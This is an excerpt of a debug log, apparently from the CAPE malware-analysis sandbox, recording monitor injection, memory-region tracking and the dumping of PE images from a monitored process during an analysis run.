2020-03-24 09:48:00,747 [root] DEBUG: AddTrackedRegion: EntryPoint 0x2b790, Entropy 5.860278e+00
2020-03-24 09:48:00,747 [root] DEBUG: AddTrackedRegion: New region at 0x00000000FF900000 size 0x1000 added to tracked regions.
2020-03-24 09:48:00,747 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-03-24 09:48:00,747 [root] INFO: Added new process to list with pid: 1632
2020-03-24 09:48:00,747 [root] INFO: Monitor successfully loaded in process with pid 1632.
2020-03-24 09:48:00,747 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-03-24 09:48:00,747 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-03-24 09:48:00,747 [root] DEBUG: Successfully injected DLL C:\ejkbjgk\dll\uFWbznX.dll.
2020-03-24 09:48:00,982 [root] DEBUG: set_caller_info: Adding region at 0x0000000000100000 to caller regions list (ntdll::NtSetInformationFile).
2020-03-24 09:48:01,013 [root] DEBUG: set_caller_info: Adding region at 0x0000000006C40000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:01,013 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2740.
2020-03-24 09:48:01,013 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:01,013 [root] DEBUG: DLL unloaded from 0x0000000077110000.
2020-03-24 09:48:01,013 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:01,013 [root] DEBUG: CreateThread: Initialising breakpoints for thread 2376.
2020-03-24 09:48:01,028 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2152).
2020-03-24 09:48:01,028 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:01,028 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:01,028 [root] DEBUG: ProtectionHandler: Adding region at 0x0000000006C41000 to tracked regions.
2020-03-24 09:48:01,028 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FFA10000.
2020-03-24 09:48:01,028 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x0000000006C41000) returned 0x0000000000000000.
2020-03-24 09:48:01,028 [root] DEBUG: ProcessImageBase: EP 0x000000000000246C image base 0x00000000FFA10000 size 0x0 entropy 3.654456e+00.
2020-03-24 09:48:01,028 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:01,028 [root] DEBUG: DLL unloaded from 0x000007FEFC530000.
2020-03-24 09:48:01,028 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x0000000006C41000) -> AllocationBase 0x0000000006C40000 RegionSize 0x200704.
2020-03-24 09:48:01,028 [root] DEBUG: DLL unloaded from 0x000007FEFCCF0000.
2020-03-24 09:48:01,028 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1644, Entropy 6.210312e+00
2020-03-24 09:48:01,028 [root] DEBUG: DLL unloaded from 0x000007FEFC680000.
2020-03-24 09:48:01,043 [root] DEBUG: AddTrackedRegion: New region at 0x0000000006C40000 size 0x31000 added to tracked regions.
2020-03-24 09:48:01,043 [root] DEBUG: DLL unloaded from 0x000007FEFC500000.
2020-03-24 09:48:01,043 [root] DEBUG: ProtectionHandler: Address: 0x0000000006C41000 (alloc base 0x0000000006C40000), NumberOfBytesToProtect: 0x31000, NewAccessProtection: 0x20
2020-03-24 09:48:01,043 [root] DEBUG: DLL unloaded from 0x000007FEFF190000.
2020-03-24 09:48:01,043 [root] DEBUG: ProtectionHandler: Increased region size at 0x0000000006C41000 to 0x32000.
2020-03-24 09:48:01,043 [root] DEBUG: ProtectionHandler: New code detected at (0x0000000006C40000), scanning for PE images.
2020-03-24 09:48:01,043 [root] DEBUG: DumpPEsInRange: Scanning range 0x6c40000 - 0x6c72000.
2020-03-24 09:48:01,043 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x6c40000
2020-03-24 09:48:01,059 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2152).
2020-03-24 09:48:01,059 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:01,059 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:01,059 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FFA10000.
2020-03-24 09:48:01,059 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000006C40000.
2020-03-24 09:48:01,059 [root] DEBUG: ProcessImageBase: EP 0x000000000000246C image base 0x00000000FFA10000 size 0x0 entropy 3.654456e+00.
2020-03-24 09:48:01,059 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001644.
2020-03-24 09:48:01,059 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2740.
2020-03-24 09:48:01,059 [root] DEBUG: ClearAllBreakpoints: Error getting thread context for thread 2376.
2020-03-24 09:48:01,059 [root] INFO: Notified of termination of process with pid 2152.
2020-03-24 09:48:01,075 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_923322036148924232020
2020-03-24 09:48:01,075 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3d000.
2020-03-24 09:48:01,075 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x6c40200-0x6c72000.
2020-03-24 09:48:01,075 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x0000000006C40000.
2020-03-24 09:48:01,091 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x6c40000 - 0x6c72000.
2020-03-24 09:48:01,091 [root] DEBUG: set_caller_info: Adding region at 0x000000000C610000 to caller regions list (ntdll::NtClose).
2020-03-24 09:48:01,091 [root] DEBUG: ProtectionHandler: Address 0x00000000FF9B9560 already in tracked region at 0x00000000FF900000, size 0x1000
2020-03-24 09:48:01,105 [root] DEBUG: ProtectionHandler: Address: 0x00000000FF9B9560 (alloc base 0x00000000FF900000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:01,105 [root] DEBUG: ProtectionHandler: Increased region size at 0x00000000FF9B9560 to 0xb9568.
2020-03-24 09:48:01,105 [root] DEBUG: ProtectionHandler: Updated region protection at 0x00000000FF9B9560 to 0x40.
2020-03-24 09:48:01,105 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:01,230 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:01,230 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:01,246 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:01,246 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:48:01,246 [root] DEBUG: ProtectionHandler: Adding region at 0x000007FEF6DCA2B0 to tracked regions.
2020-03-24 09:48:01,246 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x000007FEF6DCA2B0) returned 0x0000000000000000.
2020-03-24 09:48:01,246 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:01,246 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x000007FEF6DCA2B0) -> AllocationBase 0x000007FEF6DA0000 RegionSize 0x4096.
2020-03-24 09:48:01,278 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1010, Entropy 5.009858e+00
2020-03-24 09:48:01,278 [root] DEBUG: AddTrackedRegion: New region at 0x000007FEF6DA0000 size 0x1000 added to tracked regions.
2020-03-24 09:48:01,293 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF6DCA2B0 (alloc base 0x000007FEF6DA0000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:01,293 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF6DCA2B0 to 0x2a2b8.
2020-03-24 09:48:01,293 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF6DA0000), scanning for PE images.
2020-03-24 09:48:01,293 [root] DEBUG: DumpPEsInRange: Scanning range 0xf6da0000 - 0xf6dca2b8.
2020-03-24 09:48:01,293 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf6da0000
2020-03-24 09:48:01,293 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:01,309 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF6DA0000.
2020-03-24 09:48:01,309 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001010.
2020-03-24 09:48:01,325 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_400251932148924232020
2020-03-24 09:48:01,339 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x1b9200.
2020-03-24 09:48:01,339 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf6da0200-0xf6dca2b8.
2020-03-24 09:48:01,339 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF6DA0000.
2020-03-24 09:48:01,339 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf6da0000 - 0xf6dca2b8.
2020-03-24 09:48:01,339 [root] DEBUG: ProtectionHandler: Address 0x000007FEF6DCEC6A already in tracked region at 0x000007FEF6DA0000, size 0x2a2b8
2020-03-24 09:48:01,339 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF6DCEC6A (alloc base 0x000007FEF6DA0000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:01,339 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF6DCEC6A to 0x2ec78.
2020-03-24 09:48:01,355 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF6DA0000), scanning for PE images.
2020-03-24 09:48:01,355 [root] DEBUG: DumpPEsInRange: Scanning range 0xf6da0000 - 0xf6dcec78.
2020-03-24 09:48:01,355 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf6da0000
2020-03-24 09:48:01,355 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:01,355 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF6DA0000.
2020-03-24 09:48:01,355 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001010.
2020-03-24 09:48:01,387 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_91622144148924232020
2020-03-24 09:48:01,387 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x1b9200.
2020-03-24 09:48:01,387 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf6da0200-0xf6dcec78.
2020-03-24 09:48:01,403 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF6DA0000.
2020-03-24 09:48:01,403 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf6da0000 - 0xf6dcec78.
2020-03-24 09:48:01,403 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:01,403 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:01,403 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:01,417 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:48:01,417 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:48:01,417 [root] DEBUG: ProtectionHandler: Adding region at 0x000007FEF64F0918 to tracked regions.
2020-03-24 09:48:01,417 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x000007FEF64F0918) returned 0x0000000000000000.
2020-03-24 09:48:01,417 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:01,417 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x000007FEF64F0918) -> AllocationBase 0x000007FEF6120000 RegionSize 0x4096.
2020-03-24 09:48:01,496 [root] DEBUG: AddTrackedRegion: EntryPoint 0x1bd8, Entropy 6.405399e+00
2020-03-24 09:48:01,496 [root] DEBUG: AddTrackedRegion: New region at 0x000007FEF6120000 size 0x1000 added to tracked regions.
2020-03-24 09:48:01,512 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF64F0918 (alloc base 0x000007FEF6120000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:01,512 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF64F0918 to 0x3d0920.
2020-03-24 09:48:01,512 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF6120000), scanning for PE images.
2020-03-24 09:48:01,512 [root] DEBUG: DumpPEsInRange: Scanning range 0xf6120000 - 0xf64f0920.
2020-03-24 09:48:01,512 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf6120000
2020-03-24 09:48:01,512 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:01,512 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF6120000.
2020-03-24 09:48:01,528 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001BD8.
2020-03-24 09:48:01,637 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1724727536148924232020
2020-03-24 09:48:01,637 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xba3000.
2020-03-24 09:48:01,651 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf6120200-0xf64f0920.
2020-03-24 09:48:01,651 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF6120000.
2020-03-24 09:48:01,651 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf6120000 - 0xf64f0920.
2020-03-24 09:48:01,651 [root] DEBUG: ProtectionHandler: Address 0x000007FEF6583FE8 already in tracked region at 0x000007FEF6120000, size 0x3d0920
2020-03-24 09:48:01,651 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF6583FE8 (alloc base 0x000007FEF6120000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:01,651 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF6583FE8 to 0x463ff6.
2020-03-24 09:48:01,667 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF6120000), scanning for PE images.
2020-03-24 09:48:01,667 [root] DEBUG: DumpPEsInRange: Scanning range 0xf6120000 - 0xf6583ff6.
2020-03-24 09:48:01,667 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf6120000
2020-03-24 09:48:01,667 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:01,667 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF6120000.
2020-03-24 09:48:01,667 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001BD8.
2020-03-24 09:48:01,792 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_708713808148924232020
2020-03-24 09:48:01,792 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xba3000.
2020-03-24 09:48:01,808 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf6120200-0xf6583ff6.
2020-03-24 09:48:01,823 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF6120000.
2020-03-24 09:48:01,823 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf6120000 - 0xf6583ff6.
2020-03-24 09:48:01,823 [root] DEBUG: ProtectionHandler: Address 0x000007FEF64F1760 already in tracked region at 0x000007FEF6120000, size 0x463ff6
2020-03-24 09:48:01,823 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF64F1760 (alloc base 0x000007FEF6120000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:01,823 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF6120000), scanning for PE images.
2020-03-24 09:48:01,839 [root] DEBUG: DumpPEsInRange: Scanning range 0xf6120000 - 0xf6583ff6.
2020-03-24 09:48:01,839 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf6120000
2020-03-24 09:48:01,839 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:01,839 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF6120000.
2020-03-24 09:48:01,839 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001BD8.
2020-03-24 09:48:02,042 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1776774542148924232020
2020-03-24 09:48:02,042 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xba3000.
2020-03-24 09:48:02,058 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf6120200-0xf6583ff6.
2020-03-24 09:48:02,058 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF6120000.
2020-03-24 09:48:02,073 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf6120000 - 0xf6583ff6.
2020-03-24 09:48:02,073 [root] DEBUG: ProtectionHandler: Address 0x000007FEF6585F36 already in tracked region at 0x000007FEF6120000, size 0x463ff6
2020-03-24 09:48:02,073 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF6585F36 (alloc base 0x000007FEF6120000), NumberOfBytesToProtect: 0x14, NewAccessProtection: 0x40
2020-03-24 09:48:02,073 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF6585F36 to 0x465f4a.
2020-03-24 09:48:02,073 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF6120000), scanning for PE images.
2020-03-24 09:48:02,073 [root] DEBUG: DumpPEsInRange: Scanning range 0xf6120000 - 0xf6585f4a.
2020-03-24 09:48:02,073 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf6120000
2020-03-24 09:48:02,073 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,088 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF6120000.
2020-03-24 09:48:02,088 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001BD8.
2020-03-24 09:48:02,230 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_843937455248924232020
2020-03-24 09:48:02,244 [root] DEBUG: DumpProcess: Module image dump success - dump size 0xba3000.
2020-03-24 09:48:02,260 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf6120200-0xf6585f4a.
2020-03-24 09:48:02,260 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF6120000.
2020-03-24 09:48:02,260 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf6120000 - 0xf6585f4a.
2020-03-24 09:48:02,260 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:02,260 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:02,276 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:02,276 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:48:02,276 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:48:02,276 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6120000.
2020-03-24 09:48:02,276 [root] DEBUG: ProtectionHandler: Adding region at 0x000007FEF57F1250 to tracked regions.
2020-03-24 09:48:02,292 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x000007FEF57F1250) returned 0x0000000000000000.
2020-03-24 09:48:02,292 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:02,292 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x000007FEF57F1250) -> AllocationBase 0x000007FEF57F0000 RegionSize 0x4096.
2020-03-24 09:48:02,322 [root] DEBUG: AddTrackedRegion: EntryPoint 0x8d52c, Entropy 6.376273e+00
2020-03-24 09:48:02,322 [root] DEBUG: AddTrackedRegion: New region at 0x000007FEF57F0000 size 0x1000 added to tracked regions.
2020-03-24 09:48:02,322 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF57F1250 (alloc base 0x000007FEF57F0000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:02,322 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF57F1250 to 0x1258.
2020-03-24 09:48:02,338 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF57F0000), scanning for PE images.
2020-03-24 09:48:02,338 [root] DEBUG: DumpPEsInRange: Scanning range 0xf57f0000 - 0xf57f1258.
2020-03-24 09:48:02,338 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf57f0000
2020-03-24 09:48:02,338 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,338 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF57F0000.
2020-03-24 09:48:02,338 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000008D52C.
2020-03-24 09:48:02,354 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1522708420248924232020
2020-03-24 09:48:02,354 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x98800.
2020-03-24 09:48:02,354 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf57f0200-0xf57f1258.
2020-03-24 09:48:02,369 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF57F0000.
2020-03-24 09:48:02,369 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf57f0000 - 0xf57f1258.
2020-03-24 09:48:02,369 [root] DEBUG: ProtectionHandler: Address 0x000007FEF57F1250 already in tracked region at 0x000007FEF57F0000, size 0x1258
2020-03-24 09:48:02,369 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF57F1250 (alloc base 0x000007FEF57F0000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x20
2020-03-24 09:48:02,369 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF57F1250 to 0x20.
2020-03-24 09:48:02,369 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF57F0000), scanning for PE images.
2020-03-24 09:48:02,385 [root] DEBUG: DumpPEsInRange: Scanning range 0xf57f0000 - 0xf57f1258.
2020-03-24 09:48:02,385 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf57f0000
2020-03-24 09:48:02,385 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,385 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF57F0000.
2020-03-24 09:48:02,385 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000008D52C.
2020-03-24 09:48:02,401 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1309766736248924232020
2020-03-24 09:48:02,401 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x98800.
2020-03-24 09:48:02,401 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf57f0200-0xf57f1258.
2020-03-24 09:48:02,417 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF57F0000.
2020-03-24 09:48:02,417 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf57f0000 - 0xf57f1258.
2020-03-24 09:48:02,417 [root] DEBUG: ProtectionHandler: Address 0x000007FEF5881D66 already in tracked region at 0x000007FEF57F0000, size 0x1258
2020-03-24 09:48:02,417 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF5881D66 (alloc base 0x000007FEF57F0000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x40
2020-03-24 09:48:02,417 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF5881D66 to 0x91d74.
2020-03-24 09:48:02,417 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF5881D66 to 0x40.
2020-03-24 09:48:02,431 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF57F0000), scanning for PE images.
2020-03-24 09:48:02,431 [root] DEBUG: DumpPEsInRange: Scanning range 0xf57f0000 - 0xf5881d74.
2020-03-24 09:48:02,431 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf57f0000
2020-03-24 09:48:02,431 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,431 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF57F0000.
2020-03-24 09:48:02,431 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000008D52C.
2020-03-24 09:48:02,463 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_1432346688248924232020
2020-03-24 09:48:02,463 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x98800.
2020-03-24 09:48:02,463 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf57f0200-0xf5881d74.
2020-03-24 09:48:02,463 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF57F0000.
2020-03-24 09:48:02,463 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf57f0000 - 0xf5881d74.
2020-03-24 09:48:02,463 [root] DEBUG: ProtectionHandler: Address 0x000007FEF5881D66 already in tracked region at 0x000007FEF57F0000, size 0x91d74
2020-03-24 09:48:02,479 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF5881D66 (alloc base 0x000007FEF57F0000), NumberOfBytesToProtect: 0xe, NewAccessProtection: 0x20
2020-03-24 09:48:02,479 [root] DEBUG: ProtectionHandler: Updated region protection at 0x000007FEF5881D66 to 0x20.
2020-03-24 09:48:02,479 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF57F0000), scanning for PE images.
2020-03-24 09:48:02,479 [root] DEBUG: DumpPEsInRange: Scanning range 0xf57f0000 - 0xf5881d74.
2020-03-24 09:48:02,479 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf57f0000
2020-03-24 09:48:02,479 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:02,494 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x000007FEF57F0000.
2020-03-24 09:48:02,494 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000008D52C.
2020-03-24 09:48:02,542 [root] INFO: Added new CAPE file to list with path: C:\aWpAMaeYY\CAPE\1632_53186608248924232020
2020-03-24 09:48:02,542 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x98800.
2020-03-24 09:48:02,556 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0xf57f0200-0xf5881d74.
2020-03-24 09:48:02,556 [root] DEBUG: ProtectionHandler: PE image(s) dumped from 0x000007FEF57F0000.
2020-03-24 09:48:02,556 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0xf57f0000 - 0xf5881d74.
2020-03-24 09:48:02,572 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000000000000.
2020-03-24 09:48:02,572 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000FF900000.
2020-03-24 09:48:02,572 [root] DEBUG: ProcessImageBase: EP 0x000000000002B790 image base 0x00000000FF900000 size 0x0 entropy 5.860278e+00.
2020-03-24 09:48:02,588 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x0000000006C40000.
2020-03-24 09:48:02,588 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6DA0000.
2020-03-24 09:48:02,588 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF6120000.
2020-03-24 09:48:02,588 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x000007FEF57F0000.
2020-03-24 09:48:02,604 [root] DEBUG: ProtectionHandler: Adding region at 0x000007FEF5581248 to tracked regions.
2020-03-24 09:48:02,604 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x000007FEF5581248) returned 0x0000000000000000.
2020-03-24 09:48:02,604 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-03-24 09:48:02,619 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x000007FEF5581248) -> AllocationBase 0x000007FEF5580000 RegionSize 0x4096.
2020-03-24 09:48:02,651 [root] DEBUG: AddTrackedRegion: EntryPoint 0x68bd0, Entropy 6.023386e+00
2020-03-24 09:48:02,651 [root] DEBUG: AddTrackedRegion: New region at 0x000007FEF5580000 size 0x1000 added to tracked regions.
2020-03-24 09:48:02,651 [root] DEBUG: ProtectionHandler: Address: 0x000007FEF5581248 (alloc base 0x000007FEF5580000), NumberOfBytesToProtect: 0x8, NewAccessProtection: 0x40
2020-03-24 09:48:02,665 [root] DEBUG: ProtectionHandler: Increased region size at 0x000007FEF5581248 to 0x1250.
2020-03-24 09:48:02,665 [root] DEBUG: ProtectionHandler: New code detected at (0x000007FEF5580000), scanning for PE images.
2020-03-24 09:48:02,665 [root] DEBUG: DumpPEsInRange: Scanning range 0xf5580000 - 0xf5581250.
2020-03-24 09:48:02,665 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0xf5580000
